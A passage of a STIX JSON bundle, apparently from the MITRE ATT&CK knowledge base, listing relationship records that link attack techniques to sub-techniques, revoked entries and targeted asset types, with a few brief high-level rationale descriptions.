["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:58:04.082Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ee14c1f8-55f5-4fcf-adc3-dc34d6ade005", "created": "2020-02-12T18:56:31.130Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ee212490-822c-4851-bf2f-06b8179a9a38", "created": "2020-02-11T18:41:44.872Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ee72cc27-2e78-47c4-8786-1351f9bcee97", "created": "2023-09-28T20:05:33.450Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:05:33.450Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ee74a23f-5981-4601-8321-a5db7af73f77", "created": "2020-10-01T01:33:01.536Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", "target_ref": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eebae2f3-aaa1-4410-8b75-db5bdac1d4d6", "created": "2023-09-28T20:04:07.868Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:04:07.868Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eeeb83cb-0a8a-412b-aae2-aede7c43d8e8", "created": "2023-09-28T21:11:45.241Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:11:45.241Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ef02e21a-5ccd-4a69-a735-b9eba6f08b91", "created": "2020-02-20T22:11:00.290Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--2e114e45-2c50-404c-804a-3af9564d240e", "target_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ef087ae8-5b2c-4cc9-99f0-c3f9550fc94e", "created": "2020-01-24T14:52:55.449Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--317fefa6-46c7-4062-adb6-2008cf6bcb41", "target_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ef1787e0-add4-4490-9777-33462acf9325", "created": "2020-10-02T16:49:31.370Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3", "target_ref": "attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ef60735b-c64b-465c-9e5f-46a4d3a49fb3", "created": "2023-09-28T19:54:48.577Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:54:48.577Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eff19f74-4940-4c8e-a3b3-b3c16fe3f5e0", "created": "2023-09-29T16:39:09.447Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:39:09.447Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f006c972-d4a0-4bbe-b5ff-985b9aaf5886", "created": "2024-05-22T17:27:16.267Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:37:21.471Z", "description": "Asset Mapping Rationale: Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. On network devices, Network Device CLI commands such as show users and show ssh can be used to display users currently logged into the device.", "relationship_type": "targets", "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f05a2592-00f9-4f1f-ba55-395af5444b96", "created": "2023-09-29T17:42:29.179Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:42:29.179Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f079c0cc-744a-4a89-a596-a2a3d4353fac", "created": "2024-05-22T17:02:36.183Z", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-22T17:02:36.183Z", "description": "Asset Mapping Rationale: Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems.", "relationship_type": "targets", "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f08d487a-7837-48f9-9301-fe0f9f144c92", "created": "2023-09-28T20:31:04.691Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:31:04.691Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f0d4d23c-2c8c-4731-9b81-7c86fed25b5d", "created": "2023-09-29T18:45:34.258Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:45:34.258Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f10611e9-4812-4780-a1d5-0ad537dd95fb", "created": "2023-09-28T21:23:01.421Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:23:01.421Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f13dac1a-090b-40c6-9093-eb4abe0deba8", "created": "2023-09-28T21:24:22.815Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:24:22.815Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f1793a83-f51c-48d4-b11e-ee9c93a28e71", "created": "2023-07-20T15:30:58.855Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-07-20T15:30:58.855Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", "target_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f18ac720-632d-4761-89b1-258a67710a1b", "created": "2020-01-24T19:46:28.013Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f19c34b2-ef3a-4581-b604-6639f501e32f", "created": "2023-10-02T20:20:32.163Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-10-02T20:20:32.163Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f1b32781-5cc4-40b3-a9b9-af069657665a", "created": "2020-10-02T14:55:43.967Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161", "target_ref": "attack-pattern--5282dd9a-d26d-4e16-88b7-7c0f4553daf4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f1bd607f-36ac-4a90-be04-b74b2297a9a7", "created": "2024-05-21T16:23:41.117Z", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-21T16:23:41.117Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--0042a9f5-f053-4769-b3ef-9ad018dfa298", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f1edb034-6dc6-4d6c-8f75-e2cd12213704", "created": "2023-09-29T17:07:38.219Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:07:38.219Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f2ce3446-c0ca-499c-bc7f-1930ce148285", "created": "2020-10-02T16:34:32.537Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2339cf19-8f1e-48f7-8a91-0262ba547b6f", "target_ref": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f2d8189b-efc4-47ff-8b63-ec58e18abc7e", "created": "2020-03-15T00:37:59.164Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "target_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f353e8ec-0766-4fbd-86b7-9ea06b52958b", "created": "2023-09-28T21:23:51.038Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:23:51.038Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f3dd024f-40b6-4dae-bbc0-8e7ce0fbf774", "created": "2024-05-23T04:11:29.313Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:38:33.205Z", "description": "Asset Mapping Rationale: Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", "relationship_type": "targets", "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f4afb180-4b30-4ed1-b094-3d74d8fd0cf1", "created": "2023-09-28T19:49:56.464Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:49:56.464Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f4c17470-c5c0-4680-ad4a-5efae63b0be6", "created": "2020-01-30T19:57:16.539Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--a257ed11-ff3b-4216-8c9d-3938ef57064c", "target_ref": "attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f4c8b1b6-8204-4cbd-be5b-f3a6080726e7", "created": "2020-02-19T18:46:06.856Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004", "target_ref": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f4dc8dba-ec23-4d49-a736-c5b1edf5e53e", "created": "2020-03-16T15:38:37.810Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--cf7b3a06-8b42-4c33-bbe9-012120027925", "target_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f531e763-3550-40ba-a6a1-81e208ca12c6", "created": "2023-09-29T16:41:06.217Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:41:06.217Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f5621ad9-c905-42e3-b59b-e0ae7b9051c7", "created": "2023-09-28T21:26:23.361Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:26:23.361Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f5c91d82-5f7c-4e40-a85a-4f1909ae5545", "created": "2023-09-29T18:44:50.280Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:44:50.280Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f5c9f641-a498-46b5-9068-39502db53cfd", "created": "2023-09-28T20:10:55.590Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:10:55.590Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f5fc2b7c-72d3-47be-8287-9608b6beb63d", "created": "2020-08-24T13:43:00.187Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", "target_ref": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f61944a4-fef5-4989-bc3d-68f86e65d7d4", "created": "2023-09-29T17:04:55.720Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:04:55.720Z", "description": "", 